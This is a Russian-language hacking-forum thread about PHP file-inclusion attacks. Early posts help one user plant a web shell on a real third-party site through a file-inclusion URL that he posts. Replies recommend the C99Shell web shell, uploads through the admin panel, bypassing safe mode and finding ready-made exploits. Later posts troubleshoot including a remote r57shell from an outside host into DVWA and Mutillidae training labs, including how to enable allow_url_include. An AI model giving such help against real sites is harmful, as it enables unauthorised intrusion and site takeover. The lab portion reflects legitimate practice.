• XSS.stack #1 – первый литературный журнал от юзеров форума

помогите с php injection

Бугага судя по первому посту аффтара, он хранит шелл у себя на сайте с раширением PHP. Спрашивается на кой? Переименуй его в .txt и будет тебе счастье.

Если же тебе мешает именно сэйф моде, то это дело можно попытаться обойти...
Да и вообще юзай нормальные шеллы, типа !C99Shell http://ccteam.ru/
 
Да и вообще юзай нормальные шеллы, типа !C99Shell http://ccteam.ru/
Да, шелл я вижу неплохой.
Бугага судя по первому посту аффтара, он хранит шелл у себя на сайте с раширением PHP. Спрашивается на кой? Переименуй его в .txt и будет тебе счастье.
переименовал его в txt и нет мне счастья(((, ибо после того, как я захожу в какую-ниить папку пишнт вот это:

Код:
Warning: main() [function.include]: Failed opening '' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/patapsan/public_html/pararam.php on line 48

:pioneer: Чёрт... помогите разобраться... :help: :bang:

(http://www.pararam.ru/pararam.php?rub=1&tem=1&files=cods/vvod.php&f=сюда_можно_шелл_вписать)
 
так и есть (мутант полный)
сходи сюда : (тут) прочитай весь постинг
прочитай и заюзай уязвимости.
Мона закачивать php сценарии (шелл или сценарий для обхода софе мод.) через админку или найди еще сплойт (ИМХО их тьма на подобный продукт!)
 
так и есть (мутант полный)
сходи сюда : (тут) прочитай весь постинг
прочитай и заюзай уязвимости.
Мона закачивать php сценарии (шелл или сценарий для обхода софе мод.) через админку или найди еще сплойт (ИМХО их тьма на подобный продукт!)

Я же пост создал, чтоб помогли с пхп-иньекцией, а не со взломом форума. Мне интересна только ПХП-ИНЖ. ЭТОГО САЙТА.

А этот сраный сайт можно и через гостевую взломать, но эото тоже сооовсем другая история
 
У меня тоже проблема с php injection. Задавал свой вопрос на античате , было много ответов но так и не нашел решение проблемы. Может здесь мне помогут.
На DVWA в разделе File Inclusion в url http://localhost/denwer/dvwa/vulnerabiliti...age=include.php после page= вместо include.php пишу например aaa и мне выдает эти ошибки :



Значит есть уязвимость и я могу залить шелл

Но когда я вместо aaa пишу msp.hut4.ru/r57shell то мне вместо шела выдает такие ошибки :



Пробовал и на Mutillidae, тоже не показывает шелл а выдает ошибки.
Из советов делал так:
В php.ini и в .htaccess записано allow_url_include on.
Пробовал давать шеллу расширение .txt? и .php но шелл не показывает.
Если я заношу шелл в главную папку dvwa и захожу по адрессу http://localhost/denwer/dvwa/r57shell.php то шелл открывается, значит он рабочий.
Вобщем не получается залить шелл на сайт через url как написано в статье для новичков , а вместо шелла выдает ошибки которые я написал выше. Как решить проблему и залить удачно шелл? В чем может быть проблема?
Буду очень благодарен за любую помощь. Очень хочется чтобы у меня получилось.
 
Vladik
Если в итоге после твоих настроек phpinfo() кажет allow_url_include on и security level в dvwa установлен в low (можешь проверить по куке), то при вызове http://localhost/dvwa/vulnerabilities/fi/?...ru/r57shell.txt вполне успешно грузится r57.
Ты походу не указал протокол (на том скрине, что вижу), вот сервер и ищет папку msp.hut4.ru, а в ней файл r57shell.
 
DASM32 в phpinfo() вообще нет надписи allow_url_include , только в файле заменяющий php.ini и в .htaccess. Уровень установлен low. Скажи ты проверял у себя на компе с dvwa если у тебя заливается мой шелл с http://msp и он залился удачно без ошибок? Что ты зделал чтобы у тебя заработало?
Ты имеешь виду мне где то надо указать протокол http или ftp ?
Подскажи пожалуйста где его указывать и какой?
Спасибо. А то я застрял на месте )
 
Vladik
Как это нету?
Тогда покажи вывод с
Код:
<?php
echo ini_get('allow_url_include') ? 'set' : 'not set';
?>
В папке с /dvwa/vulnerabilities/fi/.

Как инклудилось - я же привел ссылку в посте.
Если нужен скрин - вот:
e5b81b39bf36.png
 
У меня в папке dvwa/vulnerabilities/fi/ в файле index вообще нет етой записи , а в другом файле в этой папке include.php тоже ничего нет. в fi/source в low.php тоже это не записано. Может в этом дело , куда это записать надо ? я попробую , может заработает.
А по той ссыслке что ты дал у меня not found. Спасибо за желание помочь.
Как я понимаю надо правильно настроить dvwa , а вот как я не знаю (

Добавлено :
Может дело в денвере ? не знаешь ? я попробую апач поставить. Или дело в dvwa?
 
Vladik
"Покажи вывод с кода в папке с /dvwa/vulnerabilities/fi/" следует понимать как "создай в этой папке файл test.php, впиши туда этот код, и выполни его, зайдя на /dvwa/vulnerabilities/fi/test.php браузером, и скопируй текст получившейся страницы сюда".
 
На странице видно только : not set и все.
В исходном коде тоже самое , только not set записано.
Это говорит о чем то?
А я врубился , это говорит что allow_url_include не настроен , иначе бы set было. А как это исправить ? )
 
Vladik

Из исходников PHP 5.3.3 (у меня эта версия, например), main.c, строка 522:
Код:
STD_PHP_INI_BOOLEAN("allow_url_include",	"0",  PHP_INI_SYSTEM,  OnUpdateBool,  allow_url_include,  php_core_globals,  core_globals)
У allow_url_include стоит место изменения PHP_INI_SYSTEM, что означает:
PHP_INI_SYSTEM Значение может быть установлено в php.ini или httpd.conf
Да и в доках написано "PHP_INI_SYSTEM в PHP 5" (просто решил это проверить).

Значит ini_set(), .htaccess и локальным php.ini его не изменишь. Лезь в папку, куда у тебя установлен denwer, затем в папку php (напр. C:\WebServers\usr\local\php5), открывай php.ini, ставь там allow_url_include в On и перезапусти сервер.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх